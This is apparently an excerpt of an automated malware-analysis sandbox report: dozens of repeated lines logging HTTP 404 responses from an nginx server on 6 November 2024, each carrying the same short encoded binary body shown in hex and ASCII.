        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:28 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:31 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:36 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:38 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:39 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:43 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:46 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Wed, 06 Nov 2024 16:38:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
